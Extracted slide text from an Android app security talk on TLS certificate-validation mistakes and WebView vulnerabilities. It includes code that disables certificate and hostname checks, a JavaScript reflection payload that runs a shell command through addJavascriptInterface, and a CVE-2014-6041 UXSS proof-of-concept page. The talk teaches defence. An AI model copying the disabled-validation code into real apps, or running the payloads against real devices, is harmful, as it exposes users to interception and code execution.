App Security on Android

岑志豪 Anfa Sam anfa@devco.re

戴夫寇爾股份有限公司

6

7

9

10

1. Client Hello

2. Server Hello3. Certificate

4. ServerHelloDone

5. ClientKeyExchange6. ChangeCipherSpec7. Handshake Finished

8. ChangeCipherSpec9. Handshake Finished

10. Application Data (HTTP)11. Application Data (HTTP)

Server Authentication

SSL 加密連線handshake 過程

檢查伺服器憑證

‧不是只要透過 SSL 加密連線就會安全

‧需要檢查伺服器所使用的憑證是否可靠合法

11

Attacker

Victim

中間⼈人攻擊 (Man-In-The-Middle Attack)

12

Server

13

15

16

!URL url = new URL("https://wikipedia.org"); URLConnection urlConnection = url.openConnection(); InputStream in = urlConnection.getInputStream(); !… !WebView mWebView = (WebView) findViewById(R.id.webView); mWebView.loadUrl("https://wikipedia.org");

17

18ref: http://devco.re/blog/2014/08/15/ssl-mishandling-on-mobile-app-development/

19ref: http://www.zdnet.com/hundreds-of-android-apps-open-to-ssl-linked-intercept-fail-7000033365/

20ref: http://www.kb.cert.org/vuls/id/582497

‣‣

21ref: http://www.find.org.tw/find/home.aspx?page=many&id=385

23

憑證被判斷為無效的 SSL 連線，藉由 handler.proceed() ⽽而繼續執⾏行

!!mWebView.setWebViewClient(new WebViewClient() { @Override public void onReceivedSslError(WebView view, SslErrorHandler handler, SslError error) { handler.proceed(); // Ignore SSL certificate errors } }); !

24

TrustManager[] trustAllManager = new TrustManager[] { new X509TrustManager() { @Override public void checkClientTrusted(X509Certificate[] chain, String authType) { } ! @Override public void checkServerTrusted(X509Certificate[] chain, String authType) { } ! @Override public X509Certificate[] getAcceptedIssuers() { return null; } }}; !SSLContext sslContext = SSLContext.getInstance("TLS"); sslContext.init(null, trustAllManager, null);

預設有實作 SSL 檢查的元件被置換成忽略 SSL 檢查的元件

25

!URL url = new URL("https://www.example.com/"); HttpsURLConnection conn = (HttpsURLConnection) url.openConnection(); !conn.setHostnameVerifier(SSLSocketFactory.ALLOW_ALL_HOSTNAME_VERIFIER); // or ... conn.setHostnameVerifier(new HostnameVerifier() { @Override public boolean verify(String hostname, SSLSession session) { return true; } });

不作核對，容許所有主機名稱通過檢查

26

28

29

class JsObject { public String toString() { return "Hello World"; } } !webView.getSettings().setJavaScriptEnabled(true); webView.addJavascriptInterface(new JsObject(), "injectedObject"); webView.loadUrl("http://www.example.com/"); !<html> <head>… <script> alert(injectedObject.toString()); </script> </head> <body>…</body> </html>

Hello World

31

32

!<script> function execute(cmdArgs) { return injectedObject.getClass().forName("java.lang.Runtime") .getMethod("getRuntime",null) .invoke(null,null).exec(cmdArgs); } execute(["/system/bin/sh","-c","cat vuln >> attacker.txt"]); </script>

Java Reflection API

33

34

35

36

37

38

39

測試 URL: http://devstd.in/cve/2014-6041/

測試環境: Android 4.1.1

!<html> <head> <title>CVE-2014-6041 UXSS DEMO</title> </head> <body> <iframe name="target_frame" src="http://devco.re/"></iframe> <br /> <input type="button" value="go" onclick="window.open('\u0000javascript:alert(document.body.innerHTML)', 'target_frame')" /> </body> </html>

40

UC Browser HD 3.4.1.483

CM Browser5.0.74

Maxthon Browser4.3.2.2000

測試結果

41

42

CVE-2012-6636 CVE-2014-1939 CVE-2014-6041

Android 2.X vulnerable non-vulnerable non-vulnerable

Android 3.X vulnerable vulnerable non-vulnerable

Android 4.0.X vulnerable vulnerable vulnerable

Android 4.1.X vulnerable vulnerable vulnerable

Android 4.2.X non-vulnerable non-vulnerable vulnerable

Android 4.3.X non-vulnerable non-vulnerable vulnerable

Android 4.4.X non-vulnerable non-vulnerable non-vulnerable

43

44